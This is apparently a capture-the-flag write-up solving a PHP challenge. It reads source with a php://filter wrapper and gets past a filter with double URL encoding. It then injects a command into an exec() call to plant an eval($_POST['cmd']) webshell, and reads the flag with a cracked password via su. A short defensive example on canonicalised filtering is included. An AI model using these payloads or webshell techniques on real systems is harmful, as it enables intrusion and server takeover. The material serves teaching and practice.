Knowledge points: PHP wrappers (php:// pseudo-protocols)
webshell exploitation
URL-encoding bypass
Linux command execution
This is obviously a file inclusion challenge, so first use the php:// filter wrapper to read the contents of GWHT.php.
http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=GWHT.php
It looks like there is a filter, so double URL encoding will get around it.
Python URL-encoding script:
# Percent-encode every character of the input as '%' followed by its code point in two hex digits.
# Feeding the output back in a second time produces the double-encoded form used in the payload below.
url = input("Enter a url: ")
encoded_url = ""
for i in url:
    encoded_url += '%' + hex(ord(i))[2:].zfill(2)
print(encoded_url)
payload:
http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=GWHT.php
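From the defender's side, the double-encoded payload above works because the filter inspects the parameter before the final percent-decoding has happened. The Python below is an added example, not code from this writeup or from the challenge: it reuses the challenge's own blocklist regex (assumed here, for illustration, to be the kind of filter applied to the file parameter, which the page does not show) and compares a once-decoded check with one that decodes to a fixed point before matching.

```python
import re
from urllib.parse import unquote

# Blocklist taken from GWHT.php (the challenge applies it to the count parameter);
# assumption for this example: a similar blocklist screens the file parameter.
BLOCKLIST = re.compile(r";|base64|rot13|base32|base16|<\?php|#", re.IGNORECASE)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the value stops changing.

    A filter that only sees the raw or once-decoded value looks at
    '%25%36%33...' or '%63%6f...' and never at the word it was meant to block.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    # Many nested encoding layers are suspicious in themselves: refuse rather than guess.
    raise ValueError("too many percent-encoding layers")


def naive_blocks(value: str) -> bool:
    """Check the value after a single decode, as a web server hands it to the script."""
    return BLOCKLIST.search(unquote(value)) is not None


def hardened_blocks(value: str) -> bool:
    """Check the fully canonicalized value; treat undecodable input as blocked."""
    try:
        return BLOCKLIST.search(canonicalize(value)) is not None
    except ValueError:
        return True


def encode_twice(text: str) -> str:
    """Constructed helper: the same double percent-encoding the page's script produces."""
    once = "".join(f"%{ord(c):02x}" for c in text)
    return "".join(f"%{ord(c):02x}" for c in once)


if __name__ == "__main__":
    payload = encode_twice("convert.base64-encode")
    print("naive filter blocks it:", naive_blocks(payload))      # False
    print("hardened filter blocks it:", hardened_blocks(payload))  # True
```

Allow-listing the resource name (here only GWHT.php is legitimate) would remove the need for a blocklist on this parameter altogether.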
Base64-decode it:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>
<style>
html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
<center><img src="question.jpg" height="200" width="200" /> </center>
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
<h1>A Counter is here, but it has someting wrong</h1>
<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
</body>
</html>
There are two pieces of PHP code in total:
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
This code requires the pass value in your cookie to equal GWHT (the value of the PASS environment variable).
The second piece of code:
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
Here we have to bypass a regex match and at the same time use the exec function below to get the flag.
So let's start solving.
Change the pass cookie value here to GWHT.
On to the second stage:
We can take control of the server by writing a webshell.
Since the regex filters php, we can use <?= ?> instead.
Now construct the payload
/?file=GWHT.php&count='|echo%20"<?=%20eval(\$_POST['cmd'])?>"%20|tee%20b.php|'
What ends up running on the server is
exec('printf \'' . '|echo "<?= eval(\$_POST['cmd'])?>" |tee b.php|' . '\' | wc -c')
Then connect with AntSword (蚁剑).
(www-data:/var/www/html) $ ls /
GWHT
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
(www-data:/var/www/html) $ find /GWHT -name *flag*
/GWHT/system/of/a/down/flag.txt
(www-data:/var/www/html) $ cat /GWHT/system/of/a/down/flag.txt
cat: /GWHT/system/of/a/down/flag.txt: Permission denied
(www-data:/var/www/html) $ ls -l /GWHT/system/of/a/down/flag.txt
-r--r----- 1 root GWHT 43 Sep 6 12:05 /GWHT/system/of/a/down/flag.txt
As you can see, we don't have permission.
(www-data:/var/www/html) $ ls /GWHT
README
avenged
dream
findaas
led
system
(www-data:/var/www/html) $ cat /GWHT/README
My password hash is 877862561ba0162ce610dd8bf90868ad414f0ec6.
There is a README file here, so read it; it turns out to be the hashed password of the GWHT account.
Go and crack it.
It comes out as GWHTCTF.
So we read flag.txt:
echo "GWHTCTF"| su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'
That's the end of the game.